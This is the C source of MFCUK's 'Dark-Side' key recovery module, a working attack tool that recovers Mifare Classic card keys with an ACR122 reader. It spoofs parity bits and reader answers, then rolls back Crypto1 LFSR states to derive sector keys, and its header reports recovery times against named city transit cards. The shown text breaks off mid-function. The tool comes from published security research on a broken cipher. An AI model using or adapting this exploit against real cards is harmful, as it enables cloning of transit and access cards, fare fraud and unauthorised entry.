/*
LICENSE
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see .
*/
/*
Package:
MiFare Classic Universal toolKit (MFCUK)
Filename:
mfcuk_keyrecovery_darkside.c
Name:
Mifare Classic "Dark-Side" Attack to reover at least 1 key for card where NO keys
are known. Uses as a corner-stone the lfsr_common_prefix() from crapto1 3.1
After this, the MFOC from Nethemba team is used to recover rest of the
keys using "Nested-Authentication" Attack
Description:
Implementing Mifare Classic "Dark Side" Key Recovery attack from this paper:
"THE DARK SIDE OF SECURITY BY OBSCURITY"
http://eprint.iacr.org/2009/137.pdf
For tag fixation it uses the DROP FIELD and CONSTANT DELAY after drop and
before authentication technique. Most of the times it gives pretty good results.
To improve the overall results, the Nt tag nonces are stored and looked-up in
a sorted array of Nt entries. We can see it as a hash map/lookup table with
resumable states for given tag nonces.
cons - extends the timeslot of attack
pros - makes attack more stable since tag nonce fixation is not as accurate
on ACR122 as on Proxmark3 or other specialized devices
License:
GPL2 (see below), Copyright (C) 2009, Andrei Costin
OS/Envs supported:
Linux
Windows
MacOS
Cygwin
Hardware tested/supported:
ACR 122U (usb)
Compiling:
Linux/MacOS/Cygwin
gcc -o zv_mf_dark_side zv_mf_dark_side.c ./crapto1-v3.1/crapto1.c
./crapto1-v3.1/crypto1.c ./libnfc-v1.2.1/bin/libnfc.lib -lnfc
-I./libnfc-v1.2.1/include -L./libnfc-v1.2.1/lib
MSVS
just copy an existing project (nfc-anticol for example) from libnfc-1.2.1-vs2005,
add the crapto1 .c files to the project and zv_mf_dark_side.c
Usage:
./mfcuk_keyrecovery_darkside -h
c:\mfcuk_keyrecovery_darkside.exe -h
Results:
about 2 minutes to recover first key for RATB Bucharest cards (10ms & 50ms sleeps)
about 3 minutes to recover first key for EasyCard Taipei (10ms & 50ms sleeps)
Known Issues:
1. The tag fixation with ACR122 is not performing well if CPU is under high load (eg. Flash Movie playing in IE, etc.)
2. Either a bug in libnfc 1.2.1 or a bug in RATB card-types 0x88 consecutive authentication goes like - one fails, one ok, even though correct keys are used
2.a Maybe need to check AC bits?
2.b Maybe AC bits/0x88 cards need a read/write or failed operation in between for the "state" to be ok and next auth to be successful?
Contact, bug-reports:
http://andreicostin.com/
mailto:zveriu@gmail.com
Requirements:
crapto1 library 3.1 (http://code.google.com/p/crapto1)
libnfc 1.4.2 (http://www.libnfc.org)
* @file mfcuk.c
*/
/*
VERSION HISTORY
--------------------------------------------------------------------------------
| Number : 0.1
| dd/mm/yyyy : 14/11/2009
| Author : zveriu@gmail.com, http://andreicostin.com
| Description: Initial version as POC, Windows MS Visual Studio version only
--------------------------------------------------------------------------------
| Number : 0.2
| dd/mm/yyyy : 14/11/2009
| Author : zveriu@gmail.com, http://andreicostin.com
| Description: Fixed some info; removed uneeded code, variables, commented lines;
| proper identation; introduced some portability fixes;
--------------------------------------------------------------------------------
| Number : 0.3
| dd/mm/yyyy : 14/11/2009
| Author : zveriu@gmail.com, http://andreicostin.com
| Description: Restructured the functionality into reusable modules, preparing
| for MFCUK package and integration with MFOC; autogen and automake packaging;
--------------------------------------------------------------------------------
*/
#include "config.h"
#include
#include
#include
#if defined(HAVE_SYS_TYPES_H)
# include
#endif
#if defined(HAVE_SYS_ENDIAN_H)
# include
#endif
#if defined(HAVE_ENDIAN_H)
# include
#endif
#if defined(HAVE_COREFOUNDATION_COREFOUNDATION_H)
# include
#endif
#if defined(HAVE_BYTESWAP_H)
# include
#endif
#include "log.h"
#if defined (__GNUC__)
# define GCC_VERSION (__GNUC__ * 100 + __GNUC_MINOR__ * 10)
# if GCC_VERSION >= 430
// Since GCC >= 4.30, GCC provides __builtin_bswapXX() alternatives so we switch to them
# undef bswap_16
# define bswap_16 __builtin_bswap16
# undef bswap_32
# define bswap_32 __builtin_bswap32
# undef bswap_64
# define bswap_64 __builtin_bswap64
# endif
#endif
// Fallback...
#if !defined (bswap_16) || !defined (bswap_32) || !defined (bswap_64)
# warning "No bswap function found! Using untested alternatives..."
static inline uint16_t bswap_16(uint16_t x)
{
return (x >> 8) | (x << 8);
}
static inline uint32_t bswap_32(uint32_t x)
{
return (bswap_16(x & 0xffff) << 16) | (bswap_16(x >> 16));
}
static inline uint64_t bswap_64(uint64_t x)
{
return (((uint64_t)bswap_32(x & 0xffffffffull)) << 32) | (bswap_32(x >> 32));
}
#endif
#include
#include
#include
#ifdef WIN32
#define NOMINMAX
#include "windows.h"
#include "xgetopt.h"
#elif __STDC__
#include
#include
#include
#endif
// NFC
#include
#include
// Crapto1
#include "crapto1.h"
// imported from libnfc's examples
#include "mifare.h"
#include "nfc-utils.h"
// internal
#include "mfcuk_mifare.h"
#include "mfcuk_utils.h"
#include "mfcuk_finger.h"
#include "mfcuk.h"
#define MAX_FRAME_LEN 264
#ifdef DEBUG
# warning Debug mode is enabled
# define WARN(...) fprintf(stderr, "%s %d: ", __FILE__, __LINE__ ); warnx (" WARNING: " __VA_ARGS__ )
# define ERR(...) fprintf(stderr, "%s %d: ", __FILE__, __LINE__ ); warnx (" ERROR " __VA_ARGS__ )
#else
# define WARN(...) warnx ("WARNING: " __VA_ARGS__ )
# define ERR(...) warnx ("ERROR: " __VA_ARGS__ )
#endif
static uint32_t bswap_32_pu8(uint8_t *pu8)
{
// TODO: This function need to be tested on both endianness machine types
return pu8[0] << 24 | pu8[1] << 16 | pu8[2] << 8 | pu8[3];
}
extern mfcuk_finger_tmpl_entry mfcuk_finger_db[];
extern int mfcuk_finger_db_entries;
// TODO: rename the array and number of items in array variable names
tag_nonce_entry_t arrSpoofEntries[MAX_TAG_NONCES]; // "Cache" array of already received tag nonces, since we cannot 100% fix one tag nonce as of now
uint32_t numSpoofEntries = 0; // Actual number of entries in the arrSpoofEntries
uint32_t numAuthAttempts = 0; // Number of authentication attempts for Recovery of keys - used to statistics. TODO: implement proper statistics with timings, number of tries, etc.
bool bfOpts[256] = {false}; // Command line options, indicates their presence, initialize with false
uint8_t verboseLevel = 0; // No verbose level by default
static const nfc_modulation nmMifare = {
.nmt = NMT_ISO14443A,
.nbr = NBR_106,
};
static int compareTagNonces(const void *a, const void *b)
{
// TODO: test the improvement (especially corner cases, over/under-flows) "return ( (*(uint32_t*)a) - (*(uint32_t*)b) );
if (*(uint32_t *)a > *(uint32_t *)b) return 1;
if (*(uint32_t *)a == *(uint32_t *)b) return 0;
if (*(uint32_t *)a < * (uint32_t *)b) return -1;
return 0; // Never reach here, but keep compilers happy
}
// TODO: combine mfcuk_verify_key_block() with mfcuk_recover_key_block(), since a lot of code is duplicate
static uint32_t mfcuk_verify_key_block(nfc_device *pnd, uint32_t uiUID, uint64_t ui64Key, mifare_key_type bKeyType, uint8_t bTagType, uint32_t uiBlock)
{
uint32_t pos;
// Keystream related variables - for verification with Crapto1/Crypto1 rollback
uint32_t nr_encrypted = 0;
uint32_t reader_response = 0;
uint32_t tag_response = 0;
uint32_t ks2 = 0;
uint32_t ks3 = 0;
struct Crypto1State *pcs;
uint64_t lfsr;
// Communication related variables
uint8_t abtAuth[4] = { 0x00, 0x00, 0x00, 0x00 };
uint8_t abtArEnc[8] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
uint8_t abtArEncPar[8] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
uint8_t abtRx[MAX_FRAME_LEN];
uint8_t abtRxPar[MAX_FRAME_LEN];
uint32_t nt, nt_orig; // Supplied tag nonce
if ((bKeyType != keyA) && (bKeyType != keyB)) {
return MFCUK_FAIL_KEYTYPE_INVALID;
}
if (!IS_MIFARE_CLASSIC_1K(bTagType) && !IS_MIFARE_CLASSIC_4K(bTagType)) {
return MFCUK_FAIL_TAGTYPE_INVALID;
}
if (!is_valid_block(bTagType, uiBlock)) {
return MFCUK_FAIL_BLOCK_INVALID;
}
// Configure the authentication frame using the supplied block
abtAuth[0] = bKeyType;
abtAuth[1] = uiBlock;
iso14443a_crc_append(abtAuth, 2);
// Now we take over, first we need full control over the CRC
if (0 > nfc_device_set_property_bool(pnd, NP_HANDLE_CRC, false)) {
return MFCUK_FAIL_COMM;
}
// We need to disable EASY_FRAMING feature to talk in "raw" mode
nfc_device_set_property_bool(pnd, NP_EASY_FRAMING, false);
// Request plain tag-nonce
if (0 > nfc_initiator_transceive_bytes(pnd, abtAuth, 4, abtRx, sizeof(abtRx), -1)) {
return MFCUK_FAIL_COMM;
}
nfc_device_set_property_bool(pnd, NP_EASY_FRAMING, true);
// Save the tag nonce (nt)
nt = bswap_32_pu8(abtRx);
nt_orig = nt;
// Init cipher with key
pcs = crypto1_create(ui64Key);
// Load (plain) uid^nt into the cipher
for (pos = 0; pos < 4; pos++) {
// Update the cipher with the tag-initialization
crypto1_byte(pcs, ((uiUID >> (8 * (3 - pos))) & 0xFF) ^ abtRx[pos], 0);
}
// Generate (encrypted) nr+parity by loading it into the cipher (Nr)
for (pos = 0; pos < 4; pos++) {
// Load in, and encrypt, the reader nonce (plain nr=0x00000000)
abtArEnc[pos] = crypto1_byte(pcs, 0x00, 0) ^ 0x00;
// Encrypt the parity bits for the 4 plaintext bytes of nr
abtArEncPar[pos] = filter(pcs->odd) ^ oddparity(0x00);
// Get the keystream encrypted Nr value currently loaded into the cypher, i.e. {Nr}
nr_encrypted = nr_encrypted << 8;
nr_encrypted = nr_encrypted | abtArEnc[pos];
}
// Skip 32 bits in pseudo random generator
nt = prng_successor(nt, 32);
// Generate reader-answer from tag-nonce (Ar)
for (pos = 4; pos < 8; pos++) {
// Get the next random byte for verify the reader to the tag
nt = prng_successor(nt, 8);
// Encrypt the reader-answer (nt' = suc2(nt))
abtArEnc[pos] = crypto1_byte(pcs, 0x00, 0) ^(nt & 0xff);
// Encrypt the parity bits for the 4 plaintext bytes of nt'
abtArEncPar[pos] = filter(pcs->odd) ^ oddparity(nt & 0xff);
// Get the keystream encrypted reader response currently loaded into the cypher, i.e. {Ar}
reader_response = reader_response << 8;
reader_response = reader_response | abtArEnc[pos];
}
// Finally we want to send arbitrary parity bits
if (0 > nfc_device_set_property_bool(pnd, NP_HANDLE_PARITY, false)) {
return MFCUK_FAIL_COMM;
}
int res;
if (0 > (res = nfc_initiator_transceive_bits(pnd, abtArEnc, 64, abtArEncPar, abtRx, sizeof(abtRx), abtRxPar))) {
return MFCUK_FAIL_AUTH;
}
crypto1_destroy(pcs);
if (res == 32) {
for (pos = 0; pos < 4; pos++) {
tag_response = tag_response << 8;
tag_response = tag_response | abtRx[pos];
}
ks2 = reader_response ^ prng_successor(nt_orig, 64);
ks3 = tag_response ^ prng_successor(nt_orig, 96);
pcs = lfsr_recovery64(ks2, ks3);
lfsr_rollback_word(pcs, 0, 0);
lfsr_rollback_word(pcs, 0, 0);
lfsr_rollback_word(pcs, nr_encrypted, 1);
lfsr_rollback_word(pcs, uiUID ^ nt_orig, 0);
crypto1_get_lfsr(pcs, &lfsr);
crypto1_destroy(pcs);
if (lfsr != ui64Key) {
return MFCUK_FAIL_CRAPTO;
}
} else {
return MFCUK_FAIL_AUTH;
}
return MFCUK_SUCCESS;
}
static uint32_t mfcuk_key_recovery_block(nfc_device *pnd, uint32_t uiUID, uint64_t ui64Key, mifare_key_type bKeyType, uint8_t bTagType, uint32_t uiBlock, uint64_t *ui64KeyRecovered)
{
// Communication variables
uint32_t pos, pos2, nt;
struct Crypto1State *pcs;
uint8_t abtAuth[4] = { 0x60, 0x00, 0x00, 0x00 };
uint8_t abtArEnc[8] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
uint8_t abtArEncPar[8] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
uint8_t abtRx[MAX_FRAME_LEN];
uint8_t abtRxPar[MAX_FRAME_LEN];
// zveriu
static uint32_t nt_orig = 0;
char sendSpoofAr = 0; // We want to spoof the Ar response with all 0s and the use random parity bits for that Nt until we have a successful 4 bits response (0x5)
tag_nonce_entry_t *ptrFoundTagNonceEntry = NULL;
// Key-recovery variables
struct Crypto1State *states_list;
struct Crypto1State *current_state;
uint32_t i;
uint64_t key_recovered;
uint8_t flag_key_recovered = 0; // FIXME: fix the {Nr} iteration properly. This a quick fix for cases when 0xDEADBEEF {Nr} is not working
if ((bKeyType != keyA) && (bKeyType != keyB)) {
return MFCUK_FAIL_KEYTYPE_INVALID;
}
if (!IS_MIFARE_CLASSIC_1K(bTagType) && !IS_MIFARE_CLASSIC_4K(bTagType)) {
return MFCUK_FAIL_TAGTYPE_INVALID;
}
if (!is_valid_block(bTagType, uiBlock)) {
return MFCUK_FAIL_BLOCK_INVALID;
}
// Configure the authentication frame using the supplied block
abtAuth[0] = bKeyType;
abtAuth[1] = uiBlock;
iso14443a_crc_append(abtAuth, 2);
// Now we take over, first we need full control over the CRC
nfc_device_set_property_bool(pnd, NP_HANDLE_CRC, false);
// We need to disable EASY_FRAMING feature to talk in "raw" mode
nfc_device_set_property_bool(pnd, NP_EASY_FRAMING, false);
// Request plain tag-nonce
//printf("Nt: ");
if (0 > nfc_initiator_transceive_bytes(pnd, abtAuth, 4, abtRx, sizeof(abtRx), -1)) {
//printf("\n\nFAILURE - Failed to get TAG NONCE!!!\n\n");
return MFCUK_FAIL_COMM;
}
nfc_device_set_property_bool(pnd, NP_EASY_FRAMING, true);
//print_hex(abtRx,4);
// Save the tag nonce (nt)
nt = bswap_32_pu8(abtRx);
// zveriu
//printf("INFO - Nonce distance %d (from 0x%08x, to 0x%08x)\n", nonce_distance(nt, nt_orig), nt, nt_orig);
nt_orig = nt;
// Max log(2, MAX_TAG_NONCES) searches, i.e. log(2, 65536) = 16
ptrFoundTagNonceEntry = (tag_nonce_entry_t *) bsearch((void *)(&nt_orig), arrSpoofEntries, numSpoofEntries, sizeof(arrSpoofEntries[0]), compareTagNonces);
// A new tag nonce detected, initialize it properly and store in the tag nonce "cache" array for use in it's next appearances
if (!ptrFoundTagNonceEntry) {
if (numSpoofEntries >= MAX_TAG_NONCES) {
//printf("\n\nFAILURE - REACHED MAX_TAG_NONCES!!! (Are we so unlucky or the USB/reader is buggy?!)\n\n");
return MFCUK_FAIL_MEMORY;
}
arrSpoofEntries[numSpoofEntries].tagNonce = nt_orig;
arrSpoofEntries[numSpoofEntries].num_of_appearances = 1;
numSpoofEntries++;
// Max log(2, MAX_TAG_NONCES) searches, i.e. log(2, 65536) = 16
qsort(arrSpoofEntries, numSpoofEntries, sizeof(arrSpoofEntries[0]), compareTagNonces);
ptrFoundTagNonceEntry = (tag_nonce_entry_t *) bsearch((void *)(&nt_orig), arrSpoofEntries, numSpoofEntries, sizeof(arrSpoofEntries[0]), compareTagNonces);
// Put the initializations done in abtRxLen == 32 section here also because maybe we don't know the key actually
ptrFoundTagNonceEntry->spoofFlag = 1;
// Hardcoding {Nr} and {Ar} and try to guess parity bits
ptrFoundTagNonceEntry->spoofNrEnc = MFCUK_DARKSIDE_START_NR;
ptrFoundTagNonceEntry->spoofArEnc = MFCUK_DARKSIDE_START_AR;
ptrFoundTagNonceEntry->spoofParBitsEnc = 0x0;
// First we need to satisfy STAGE1
ptrFoundTagNonceEntry->current_out_of_8 = -1;
} else {
ptrFoundTagNonceEntry->num_of_appearances++;
if ( // If we went beyond MFCUK_DARKSIDE_MAX_LEVELS without findind a key, need to check next {Nr}
(ptrFoundTagNonceEntry->current_out_of_8 >= MFCUK_DARKSIDE_MAX_LEVELS) ||
// Can have only 32 combinations of the last 5 bits of parity bits which generated the first NACK
((ptrFoundTagNonceEntry->current_out_of_8 >= 0) && (ptrFoundTagNonceEntry->parBitsCrntCombination[ptrFoundTagNonceEntry->current_out_of_8] >= 0x20))
) {
// If no key discovered for current {Nr}, {Ar}, 29bit-prefix, go back to satisfy STAGE1 with other {Nr} value, {Ar} we keep the same
ptrFoundTagNonceEntry->spoofNrEnc++;
ptrFoundTagNonceEntry->spoofArEnc = MFCUK_DARKSIDE_START_AR;
ptrFoundTagNonceEntry->spoofParBitsEnc = 0x0;
ptrFoundTagNonceEntry->current_out_of_8 = -1;
return MFCUK_FAIL_AUTH;
}
/*
// TODO: if above block is working fine, delete this commented - above one created to reduce code-duplication
// If we went beyond MFCUK_DARKSIDE_MAX_LEVELS without findind a key, need to check next {Nr}
if (ptrFoundTagNonceEntry->current_out_of_8 >= MFCUK_DARKSIDE_MAX_LEVELS)
{
//printf("FAILURE - This Nt, {Pfx}, consecutive {Nr}s and {ParBits} combination cannot produce a key-recoverable state\n");
//printf("\tINFO: try changing initial {Nr}, {Ar} and timings of sleep()\n");
//printf("{Nr} is not a DEADBEEF.... Need to find BEEF ALIVE!... Trying next one...\n");
ptrFoundTagNonceEntry->spoofNrEnc++;
ptrFoundTagNonceEntry->spoofArEnc = 0xFACECAFE;
ptrFoundTagNonceEntry->spoofParBitsEnc = 0x0;
// If no key discovered for current {Nr}, {Ar}, 29bit-prefix, go back to satisfy STAGE1 with other {Nr} value, {Ar} we keep the same
ptrFoundTagNonceEntry->current_out_of_8 = -1;
return MFCUK_FAIL_AUTH;
}
if (ptrFoundTagNonceEntry->current_out_of_8 >= 0)
{
// Can have only 32 combinations of the last 5 bits of parity bits which generated the first NACK
if (ptrFoundTagNonceEntry->parBitsCrntCombination[ptrFoundTagNonceEntry->current_out_of_8] >= 0x20)
{
//printf("FAILURE - This consecutive {Nr}s and {ParBits} combination cannot produce all 8 required NACKs and KSs of NACKs\n");
//printf("\tINFO: try changing initial {Nr}, {Ar} and timings of sleep()\n");
//printf("{Nr} is not a DEADBEEF.... Need to find BEEF ALIVE!... Trying next one...\n");
ptrFoundTagNonceEntry->spoofNrEnc++;
ptrFoundTagNonceEntry->spoofArEnc = 0xFACECAFE;
ptrFoundTagNonceEntry->spoofParBitsEnc = 0x0;
// If no key discovered for current {Nr}, {Ar}, 29bit-prefix, go back to satisfy STAGE1 with other {Nr} value, {Ar} we keep the same
ptrFoundTagNonceEntry->current_out_of_8 = -1;
return MFCUK_FAIL_AUTH;
}
}
*/
}
sendSpoofAr = ptrFoundTagNonceEntry->spoofFlag;
// Init cipher with key
pcs = crypto1_create(ui64Key);
// Load (plain) uid^nt into the cipher
for (pos = 0; pos < 4; pos++) {
// Update the cipher with the tag-initialization
// TODO: remove later - crypto1_byte(pcs, pbtUid[pos]^abtRx[pos], 0);
crypto1_byte(pcs, ((uiUID >> (8 * (3 - pos))) & 0xFF) ^ abtRx[pos], 0);
}
// Generate (encrypted) nr+parity by loading it into the cipher (Nr)
for (pos = 0; pos < 4; pos++) {
// Load in, and encrypt, the reader nonce (plain nr=0x00000000)
abtArEnc[pos] = crypto1_byte(pcs, 0x00, 0) ^ 0x00;
// Encrypt the parity bits for the 4 plaintext bytes of nr
abtArEncPar[pos] = filter(pcs->odd) ^ oddparity(0x00);
if (sendSpoofAr) {
if (ptrFoundTagNonceEntry->current_out_of_8 < 0) {
abtArEnc[pos] = (ptrFoundTagNonceEntry->spoofNrEnc >> (8 * (3 - pos))) & 0xFF;
abtArEncPar[pos] = (ptrFoundTagNonceEntry->spoofParBitsEnc >> (7 - pos)) & 0x01;
} else {
abtArEnc[pos] = (ptrFoundTagNonceEntry->nrEnc[ptrFoundTagNonceEntry->current_out_of_8] >> (8 * (3 - pos))) & 0xFF;
abtArEncPar[pos] = ((ptrFoundTagNonceEntry->parBits[ptrFoundTagNonceEntry->current_out_of_8] + ptrFoundTagNonceEntry->parBitsCrntCombination[ptrFoundTagNonceEntry->current_out_of_8]) >> (7 - pos)) & 0x01;
}
}
}
// Skip 32 bits in pseudo random generator
nt = prng_successor(nt, 32);
// Generate reader-answer from tag-nonce (Ar)
for (pos = 4; pos < 8; pos++) {
// Get the next random byte for verify the reader to the tag
nt = prng_successor(nt, 8);
// Encrypt the reader-answer (nt' = suc2(nt))
abtArEnc[pos] = crypto1_byte(pcs, 0x00, 0) ^(nt & 0xff);
// Encrypt the parity bits for the 4 plaintext bytes of nt'
abtArEncPar[pos] = filter(pcs->odd) ^ oddparity(nt & 0xff);
// zveriu - Make the Ar incorrect, but leave parity bits calculated/guessed_spoofed as above
/* If all eight parity bits are correct, but the answer Ar is
wrong, the tag responds with the 4-bit error code 0x5
signifying failed authentication, called ‘transmission error’ in [KHG08].
*/
if (sendSpoofAr) {
if (ptrFoundTagNonceEntry->current_out_of_8 < 0) {
abtArEnc[pos] = (ptrFoundTagNonceEntry->spoofArEnc >> (8 * (7 - pos))) & 0xFF;
abtArEncPar[pos] = (ptrFoundTagNonceEntry->spoofParBitsEnc >> (7 - pos)) & 0x01;
} else {
abtArEnc[pos] = (ptrFoundTagNonceEntry->arEnc[ptrFoundTagNonceEntry->current_out_of_8] >> (8 * (7 - pos))) & 0xFF;
abtArEncPar[pos] = ((ptrFoundTagNonceEntry->parBits[ptrFoundTagNonceEntry->current_out_of_8] + ptrFoundTagNonceEntry->parBitsCrntCombination[ptrFoundTagNonceEntry->current_out_of_8]) >> (7 - pos)) & 0x01;
}
}
}
if (ptrFoundTagNonceEntry->current_out_of_8 >= 0) {
// Prepare for the next round (if this one is not successful) the next 5 bit combination for current parity bits
ptrFoundTagNonceEntry->parBitsCrntCombination[ptrFoundTagNonceEntry->current_out_of_8]++;
}
// Finally we want to send arbitrary parity bits
nfc_device_set_property_bool(pnd, NP_HANDLE_PARITY, false);
// Transmit reader-answer
//printf(" Ar: ");
//print_hex_par(abtArEnc,64,abtArEncPar);
int res;
if (0 > (res = nfc_initiator_transceive_bits(pnd, abtArEnc, 64, abtArEncPar, abtRx, sizeof(abtRx), abtRxPar))) {
if (sendSpoofAr) {
ptrFoundTagNonceEntry->spoofParBitsEnc++;
}
return MFCUK_FAIL_AUTH;
}
// zveriu - Successful: either authentication (szRx == 32) either encrypted 0x5 reponse (szRx == 4)
if (res == 4) {
//printf("INFO - 4-bit (szRx=%d) error code 0x5 encrypted (abtRx=0x%02x)\n", szRx, abtRx[0] & 0xf);
if (ptrFoundTagNonceEntry->current_out_of_8 < 0) {
ptrFoundTagNonceEntry->spoofNackEnc = abtRx[0] & 0xf;
ptrFoundTagNonceEntry->spoofKs = ptrFoundTagNonceEntry->spoofNackEnc ^ 0x5;
ptrFoundTagNonceEntry->spoofNrPfx = ptrFoundTagNonceEntry->spoofNrEnc & 0xFFFFFF1F;
// Initialize the {Nr} with proper 29 bits prefix and {Par} with proper 3 bits prefix
for (pos = 0; pos < 8; pos++) {
ptrFoundTagNonceEntry->nrEnc[pos] = ptrFoundTagNonceEntry->spoofNrPfx | pos << 5;
ptrFoundTagNonceEntry->arEnc[pos] = ptrFoundTagNonceEntry->spoofArEnc;
ptrFoundTagNonceEntry->parBits[pos] = ptrFoundTagNonceEntry->spoofParBitsEnc & 0xE0;
ptrFoundTagNonceEntry->parBitsCrntCombination[pos] = 0;
}
// Mark the begining of collecting STAGE2 probes
ptrFoundTagNonceEntry->current_out_of_8 = 0;
} else {
ptrFoundTagNonceEntry->nackEnc[ptrFoundTagNonceEntry->current_out_of_8] = abtRx[0] & 0xf;
ptrFoundTagNonceEntry->ks[ptrFoundTagNonceEntry->current_out_of_8] = ptrFoundTagNonceEntry->nackEnc[ptrFoundTagNonceEntry->current_out_of_8] ^ 0x5;
ptrFoundTagNonceEntry->current_out_of_8++;
if (ptrFoundTagNonceEntry->current_out_of_8 == 8) {
for (pos = 0; pos < 8; pos++) {
for (pos2 = 0; pos2 < 8; pos2++) {
ptrFoundTagNonceEntry->parBitsArr[pos][pos2] = ((ptrFoundTagNonceEntry->parBits[pos] + ptrFoundTagNonceEntry->parBitsCrntCombination[pos] - 1) >> (7 - pos2)) & 0x01;
}
}
states_list = lfsr_common_prefix(ptrFoundTagNonceEntry->spoofNrPfx, ptrFoundTagNonceEntry->spoofArEnc, ptrFoundTagNonceEntry->ks, ptrFoundTagNonceEntry->parBitsArr);
for (i = 0; (states_list) && ((states_list + i)->odd != 0 || (states_list + i)->even != 0) && (i < MAX_COMMON_PREFIX_STATES); i++) {
current_state = states_list + i;
lfsr_rollback_word(current_state, uiUID ^ ptrFoundTagNonceEntry->tagNonce, 0);
crypto1_get_lfsr(current_state, &key_recovered);
if (bfOpts['v'] && (verboseLevel > 1)) {
log_key(uiBlock, key_recovered);
printf("\nINFO: block %d recovered KEY: %012"PRIx64"\n", uiBlock, key_recovered);
}
flag_key_recovered = 1;
*ui64KeyRecovered = key_recovered;
}
crypto1_destroy(states_list);
if (!flag_key_recovered) {
//printf("{Nr} is not a DEADBEEF.... Need to find BEEF ALIVE!... Trying next one...\n");
ptrFoundTagNonceEntry->spoofNrEnc++;
ptrFoundTagNonceEntry->spoofArEnc = MFCUK_DARKSIDE_START_AR;
ptrFoundTagNonceEntry->spoofParBitsEnc = 0x0;
// If no key discovered for current {Nr}, {Ar}, 29bit-prefix, go back to satisfy STAGE1 with other {Nr} value, {Ar} we keep the same
ptrFoundTagNonceEntry->current_out_of_8 = -1;
return MFCUK_FAIL_CRAPTO;
}
}
}
} else if (res == 32) {
// Are we so MFCUKing lucky (?!), since ui64Key is a "dummy" key
flag_key_recovered = true;
*ui64KeyRecovered = ui64Key;
}
//printf(" At: ");
//print_hex_par(abtRx,szRx,abtRxPar);
crypto1_destroy(pcs);
if (flag_key_recovered) {
return MFCUK_OK_KEY_RECOVERED;
} else {
return MFCUK_SUCCESS;
}
}
/*
TODO:
- have an option with frequency of the display information, and with portable way of getting elapsed time
-m max_iterations - stop everything after so many iterations, default is infinite until all keys found
-T max_elapsed_time - stop after time elapsed
*/
static void print_usage(FILE *fp, const char *prog_name)
{
fprintf(fp, "Usage:\n");
fprintf(fp, "-C - require explicit connection to the reader. Without this option, the connection is not made and recovery will not occur\n");
fprintf(fp, "-i mifare.dmp - load input mifare_classic_tag type dump\n");
fprintf(fp, "-I mifare_ext.dmp - load input extended dump specific to this tool, has several more fields on top of mifare_classic_tag type dump\n");
fprintf(fp, "-o mifare.dmp - output the resulting mifare_classic_tag dump to a given file\n");
fprintf(fp, "-O mifare_ext.dmp - output the resulting extended dump to a given file\n");
fprintf(fp, "-V sector[:A/B/any_other_alphanum[:fullkey]] - verify key for specified sector, -1 means all sectors\n");
fprintf(fp, "\tAfter first semicolon key-type can specified: A verifies only keyA, B verifies only keyB, anything else verifies both keys\n");
fprintf(fp, "\tAfter second semicolon full 12 hex-digits key can specified - this key will override any loaded dump key for the given sector(s) and key-type(s)\n");
fprintf(fp, "-R sector[:A/B/any_other_alphanum] - recover key for sector, -1 means all sectors.\n");
fprintf(fp, "\tAfter first semicolon key-type can specified: A recovers only keyA, B recovers only keyB, anything else recovers both keys\n");
fprintf(fp, "-U UID - force specific UID. If a dump was loaded with -i, -U will overwrite the in the memory where dump was loaded\n");
fprintf(fp, "-M tagtype - force specific tagtype. 8 is 1K, 24 is 4K, 32 is DESFire\n");
fprintf(fp, "-D - for sectors and key-types marked for verification, in first place use default keys to verify (maybe you are lucky)\n");
fprintf(fp, "-d key - specifies additional full 12 hex-digits default key to be checked. Multiple -d options can be used for more additional keys\n");
fprintf(fp, "-s - milliseconds to sleep for SLEEP_AT_FIELD_OFF (Default: %d ms)\n", SLEEP_AT_FIELD_OFF);
fprintf(fp, "-S - milliseconds to sleep for SLEEP_AFTER_FIELD_ON (Default: %d ms)\n", SLEEP_AFTER_FIELD_ON);
fprintf(fp, "-P hex_literals_separated - try to recover the key from a conversation sniffed with Proxmark3 (mifarecrack.c based). Accepts several options:\n");
fprintf(fp, "\tConcatenated string in hex literal format of form uid:tag_chal:nr_enc:reader_resp:tag_resp\n");
fprintf(fp, "\tExample -P 0x5c72325e:0x50829cd6:0xb8671f76:0xe00eefc9:0x4888964f would find key FFFFFFFFFFFF\n");
fprintf(fp, "-p proxmark3_full.log - tries to parse the log file on it's own (mifarecrack.py based), get the values for option -P and invoke it\n");
fprintf(fp, "-F - tries to fingerprint the input dump (-i) against known cards' data format\n");
fprintf(fp, "-v verbose_level - verbose level (default is O)\n");
fprintf(fp, "\n");
fprintf(fp, "Usage examples:\n");
fprintf(fp, " Recove all keys from all sectors:\n");
fprintf(fp, " %s -C -R -1\n", prog_name);
fprintf(fp, " Recove the sector #0 key with 250 ms for all delays (delays could give more results): \n");
fprintf(fp, " %s -C -R 0 -s 250 -S 250\n", prog_name);
return;
}
static void print_identification(void)
{
fprintf(stdout, "%s - %s\n", PACKAGE_NAME, PACKAGE_VERSION);
fprintf(stdout, "%s - %s\n", BUILD_NAME, BUILD_VERSION);
fprintf(stdout, "by %s\n", BUILD_AUTHOR);
fprintf(stdout, "\n");
}
static void print_mifare_classic_tag_actions(const char *title, mifare_classic_tag *tag)
{
uint32_t i, max_blocks, trailer_block;
uint8_t bTagType;
mifare_classic_block_trailer *ptr_trailer = NULL;
if (!tag) {
return;
}
bTagType = tag->amb->mbm.btUnknown;
if (!IS_MIFARE_CLASSIC_1K(bTagType) && !IS_MIFARE_CLASSIC_4K(bTagType)) {
return;
}
printf("%s - UID %02x %02x %02x %02x - TYPE 0x%02x (%s)\n",
title, tag->amb->mbm.abtUID[0], tag->amb->mbm.abtUID[1], tag->amb->mbm.abtUID[2], tag->amb->mbm.abtUID[3], bTagType,
(IS_MIFARE_CLASSIC_1K(bTagType) ? (MIFARE_CLASSIC_1K_NAME) : (IS_MIFARE_CLASSIC_4K(bTagType) ? (MIFARE_CLASSIC_4K_NAME) : (MIFARE_CLASSIC_UNKN_NAME)))
);
printf("---------------------------------------------------------------------\n");
printf("Sector\t| Key A\t|ACTS | RESL\t| Key B\t|ACTS | RESL\n");
